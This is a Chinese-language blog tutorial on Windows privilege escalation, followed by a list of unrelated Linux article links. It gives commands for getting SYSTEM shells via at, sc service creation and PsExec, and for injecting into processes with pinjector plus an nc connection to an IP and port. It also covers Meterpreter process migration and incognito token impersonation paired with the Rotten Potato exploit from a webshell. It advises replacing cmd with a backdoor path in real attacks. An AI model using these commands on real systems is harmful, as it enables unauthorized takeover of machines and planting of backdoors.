【权限提升】Win本地用户&进程注入&令牌窃取&AT&SC&PS服务命令

简介: 【权限提升】Win本地用户&进程注入&令牌窃取&AT&SC&PS服务命令

Win本地用户-AT&SC&PS命令

利用Windows特性,权限继承

1、at命令提权的原理

at命令是一个计划命令,可以在规定时间完成一些操作,这个命令调用system权限。

适用版本:Win2000 & Win2003 & XP中还是存在的,在Win7以后被剔除.

当我们拿到低权限的用户(webshell用户不能创建计划命令),通过连接上服务器后,可以通过at命令来进行本地提权。

提权命令:Test in Win2k3 系统级默认调用

at 21:00 /interactive cmd (在20:33分生成一个交互式的System权限的cmd)


2、sc命令

sc是用于与服务控制管理器和服务进行通信的命令行程序。提供的功能类似于控制面板中管理工具项中的服务。适用版本:windows 7、8、03、08、12、16

#创建一个名叫syscmd的新的交互式的cmd执行服务

sc Create syscmd binPath= "cmd /K start" type= own type= interact

#运行服务

sc start syscmd


win2k3下:

win server 2008下:

  1. PsTools 百度云链接

Telnet 等实用工具和远程控制程序(如 Symantec 的 PC Anywhere)允许你在远程系统上执行程序,但它们可能很难设置并要求你在想要访问的远程系统上安装客户端软件。 PsExec 是一种轻量级 telnet-replacement,可用于在其他系统上执行进程,为控制台应用程序提供完全交互性,而无需手动安装客户端软件。 PsExec 最强大的用途包括对远程系统和远程启用工具(如 IpConfig)启动交互式命令提示符,否则无法显示有关远程系统的信息。

注意:一些防病毒扫描程序报告一个或多个工具感染了“远程管理员”病毒。 PsTools 中没有含有病毒,但它们已被病毒使用,这就是为什么它们触发病毒通知的原因。


适用版本:Test in Win2012 and Win2008 & Win2016 其他未测 基本可以


https://docs.microsoft.com/zh-cn/sysinternals/downloads/pstools

psexec.exe -accepteula -s -i -d cmd #调用运行cmd

win2016:

win10(非服务器版本):

版本一:

版本二:


服务器版本基本可以, PC个人电脑具体情况看win10上是否安装对应服务

实战情况下将cmd命令替换成后门路径,以system权限执行。


WIN本地用户-进程迁移注入获取 pinjector百度云链接

相当于开了一个后门,注入到其他用户进程下!
  1. Win2008以前版本 -Test in Win2k3-本地权限-本地虚拟机

部分进程默认system权限

1. pinjector -p 420 cmd 3333  #在PID= 进程下添加一个继承父进程权限的线程
2. nc 192.168.46.149 3333


2、MSF进程注入 本地权限-Win2008&2012&2016

1. ps //查看进程
2. migrate PID //迁移对应PID
3. 将后门上线普通用户权限进程注入到system权限进程下

测试版本win server2016:

image.png

WIN本地用户-Web-令牌窃取&土豆

令牌窃取 Win2008 Win2012

假冒令牌可以假冒一个网络中的另一个用户进行各类操作。所以当一个攻击者需要域管理员的操作权限时候,需通过假冒域管理员的令牌进行攻击。


  1. 本地权限 - win server2008&win 10

测试版本win server2008:

1. use incognito
2. list_tokens -u
3. impersonate_token "NT AUTHORITY\SYSTEM"


  1. Web权限 - Test in Win2008 12 16
webshell权限是不能直接进行令牌窃取的,配合烂土豆(ms16-075)


execute -cH -f ./potato.exe //配合烂土豆

use incognito

list_tokens -u

impersonate_token "NT AUTHORITY\SYSTEM"


测试版本win server2008

以webshell权限执行后门,即是IIS APPPOOL\asp access权限,且直接使用令牌窃取不能成功,需配合烂土豆

未配合烂土豆:


配合烂土豆:

相关文章
|
16天前
|
监控 Linux 应用服务中间件
探索Linux中的`ps`命令:进程监控与分析的利器
探索Linux中的`ps`命令:进程监控与分析的利器
|
9天前
|
小程序 Linux
【编程小实验】利用Linux fork()与文件I/O:父进程与子进程协同实现高效cp命令(前半文件与后半文件并行复制)
这个小程序是在文件IO的基础上去结合父子进程的一个使用,利用父子进程相互独立的特点实现对数据不同的操作
|
13天前
|
Linux 数据处理 调度
深入探索Linux的renice命令:优化进程优先级
`renice`命令在Linux中用于调整运行进程的优先级,范围-20(最高)至19(最低)。它可以实时改变进程的优先级,无需重启,支持按PID、进程组或用户批量修改。例如,`renice -n 10 -p 1234`将PID为1234的进程优先级设为10。使用时要注意不要滥用高优先级,避免频繁修改,了解系统负载,并记录变更,通常需root权限。
|
16天前
|
Web App开发 运维 监控
深入探索Linux命令pwdx:揭秘进程工作目录的秘密
`pwdx`命令在Linux中用于显示指定进程的工作目录,基于`/proc`文件系统获取实时信息。简单易用,如`pwdx 1234`显示PID为1234的进程目录。结合`ps`和`pgrep`等命令可扩展使用,如查看所有进程或特定进程(如Firefox)的目录。使用时注意权限、进程ID的有效性和与其他命令的配合。查阅`man pwdx`获取更多帮助。
|
22天前
|
缓存 监控 安全
Linux top命令详解:持续监听进程运行状态
Linux top命令详解:持续监听进程运行状态
33 3
|
23天前
|
监控 Linux Shell
探索Linux命令nice:优雅地调整进程优先级
`nice`命令在Linux中用于调整进程优先级,影响资源分配。它允许设置-20到19的nice值,数值越低,优先级越高。在数据处理时,使用`nice`可控制任务优先级,避免占用全部CPU资源。例如,`nice -n 10 command`以低优先级启动`command`。注意不要过度使用,应根据系统负载和需求谨慎调整。使用`renice`可改变已运行进程的优先级,生产环境操作需谨慎。
|
3天前
|
应用服务中间件 nginx
cmd 杀掉 nginx后台进程 命令杀掉nginx后台 nginx 常用命令
cmd 杀掉 nginx后台进程 命令杀掉nginx后台 nginx 常用命令
7 0
|
16天前
|
监控 Linux
深入了解Linux的pmap命令:进程内存映射的利器
`pmap`是Linux下分析进程内存映射的工具,显示内存区域、权限、大小等信息。通过`/proc/[pid]/maps`获取数据,特点包括详细、实时和灵活。参数如`-x`显示扩展信息,`-d`显示设备。示例:`pmap -x 1234`查看进程1234的映射。注意权限、实时性和准确性。结合其他工具定期监控,排查内存问题。
|
2月前
|
Linux
百度搜索:蓝易云【Linux系统ps命令:查看正在运行的进程】
通过这些简洁的ps命令用法,你可以方便地查看Linux系统中正在运行的进程信息。
55 1
|
2月前
|
存储 监控 Linux
【Shell 命令集合 系统管理 】⭐⭐⭐Linux 查看当前正在运行的进程信息 ps命令 使用指南
【Shell 命令集合 系统管理 】⭐⭐⭐Linux 查看当前正在运行的进程信息 ps命令 使用指南
64 0

热门文章

最新文章